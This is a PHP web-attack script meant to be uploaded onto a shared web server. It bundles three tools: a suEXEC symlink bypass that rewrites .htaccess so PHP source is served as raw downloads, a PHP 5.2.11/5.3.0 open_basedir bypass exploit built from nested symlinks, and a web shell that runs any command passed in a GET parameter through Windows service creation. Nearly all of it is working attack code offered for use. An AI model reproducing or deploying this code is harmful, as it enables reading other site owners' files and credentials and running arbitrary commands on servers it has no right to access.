<html> 
<body bgcolor="0000000"> 
<title>symlink</title> 
<center><b><h2><font color="red"> SUEXE Bypasser Via Symlink (V 1.01)</font></br></center></b></h2> 
<center><b><h4><font color="red">WITH THIS SCRIPT U CAN USE SYMLINK IN 2 METHODs</font></br></center></b></h4> 
<center><b><h4><font color="white">Dest = Destenation Of Path or file That u Want to Symlink It</font></br></center></b></h4> 
<center><b><h4><font color="white">name : File Name That u Want To create in ([path]/smlnk)</font></br></center></b></h4> 
<center><b><h4><font color="white">Upload This Script In Full SUEXE or FullPerm Directory</font></br></center></b></h4> 
<center><b><h4><font color="white">Written For *NIX Platforms</font></br></center></b></h4> 
</html> 

<?php 
//CODED BY IRAN 
//form defining 
print "<form method=post>"; 
print "<center><font color=green>"; 
print "<b>dest :</b><input size=50 name='destenation' value=''>"; 
print "<br>"; 
print "<b>name :</b><input size=50 name='name' value=''>"; 
print "<br>"; 
print "<input type=submit name=_act value='Create!'>"; 
print "</center></font>"; 
$dest = $_POST['destenation']; 
$destname = $_POST['name']; 
?> 

<?php 
//defining variables 
$dir = dirname($_SERVER[SCRIPT_FILENAME])."/smlnk"; 
$acc = $dir."/.htaceess"; 
$cmd = "ln -s".chr(32).$dest.chr(32).$sym; 
$sym = $dir."/".$destname; 
$htaccess =  
"Options +FollowSymLinks".chr(009). 
"DirectoryIndex seees.html".chr(009). 
"RemoveHandler .php".chr(009). 
"AddType application/octet-stream .php"; 

if (!file_exists($dir)) { 
mkdir ($dir); 
}  
sleep(1); 
if (!file_exists($acc)) { 
$handle = fopen( "$acc" , 'a+' ); 
fputs( $handle ,  "$htaccess" ); 
}  
?> 

<?php 
//check method 
if (function_exists (exec) OR function_exists (shell_exec) OR function_exists (system) OR function_exists (passthru)) { 
$check = 1; 
}else{ 
$check = 0; 
} 
if(function_exists (symlink)) { 
$checks = 1; 
}else{ 
$checks = 0; 
} 
?> 

<?php 
//define command function 
$resault = '';  
function command($cmde) { 
    if (!empty($cmde))  
 {  
if (function_exists('exec')) { $resault = @exec($cmde); }  
elseif (function_exists('shell_exec')) { $resault = @shell_exec($cmde); }  
elseif (function_exists('system')) { $resault = @system($cmde); }  
elseif (function_exists('passthru')) { $resault = @passthru($cmde); }  
 } 
return $resault; 
} 
?> 

<?php 
//execution 
if ($check ==1 && $checks ==1){ command ($cmd); } 
elseif ($check ==1 && $checks ==0){ command ($cmd); } 
elseif ($check ==0 && $checks ==1) { symlink ($dest,$sym); } 
elseif ($check ==0 && $checks ==0)  
{  
print ("<center><font color=green><h1>script doesnt work for this server</font></h1></center>");  
} 
?> 
<?php 
//is safe mod on ? start 
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  
{  
$safe="<font color=red>ON</font>"; 
}  
else {$safe="<font color=green>OFF</font>";} 
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>"; 
//open safe mod end-- 
?>  
<?php 
//disable function start 
echo "<font color=whitepurple>Disable functions :</font> <b>"; 
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} 
//disable function end-- 
?>

<?php 
/* 
PHP 5.2.11/5.3.0 symlink() open_basedir bypass  
posted 3y HackTeach Loverz http://HackTeach.org/ 
i1t [ a.T] hotmail [ d0t] it 

CHUJWAMWMUZG 
*/ 

$fakedir="cx"; 
$fakedep=16; 

$num=0; // offset of symlink.$num 

if(!empty($_GET['file'])) $file=$_GET['file']; 
else if(!empty($_POST['file'])) $file=$_POST['file']; 
else $file=""; 

echo '<PRE><img 
src="http://www.hackteach.org/public/images/main.gif"><P>This is exploit 
from <a 
href="http://HackTeach.org" title="Hack Teach Loverz">Storm , DareDevil 
Lab - HackTeach</a> labs. 
posted by : storm 
<p>Script for legal use only. 
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass 
<p>More: <a href="http://HackTeach.org/">HackTeachLoverz</a> 
<p><form name="form" 
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF 
"]).'" method="post"><input type="text" name="file" size="50" 
value="'.htmlspecialchars($file).'"><input type="submit" name="hym" 
value="Create Symlink"></form>'; 

if(empty($file)) 
    exit; 

if(!is_writable(".")) 
    die("not writable directory"); 

$level=0; 

for($as=0;$as<$fakedep;$as++){ 
    if(!file_exists($fakedir)) 
        mkdir($fakedir); 
    chdir($fakedir); 
} 

while(1<$as--) chdir(".."); 

$hardstyle = explode("/", $file); 

for($a=0;$a<count($hardstyle);$a++){ 
    if(!empty($hardstyle[$a])){ 
        if(!file_exists($hardstyle[$a]))  
            mkdir($hardstyle[$a]); 
        chdir($hardstyle[$a]); 
        $as++; 
    } 
} 
$as++; 
while($as--) 
    chdir(".."); 

@rmdir("fakesymlink"); 
@unlink("fakesymlink"); 

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); 

// this loop will skip allready created symlinks. 
while(1) 
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, 
"symlink".$num))) break; 
    else $num++; 

@unlink("fakesymlink"); 
mkdir("fakesymlink"); 

die('<FONT COLOR="RED">check symlink <a 
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); 
?>

<?php 
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand 
$dir=ini_get('upload_tmp_dir'); #Directory to store command's output 
if(!extension_loaded('win32service'))die('win32ser  vice extension not found!'); 
$name=$dir."\\".uniqid('NJ'); 
$n=uniqid('NJ'); 
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; 
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); 
win32_start_service($n); 
win32_stop_service($n); 
win32_delete_service($n); 
$exec=file_get_contents($name); 
unlink($name); 
echo "<pre>".htmlspecialchars($exec)."</pre>"; 
?>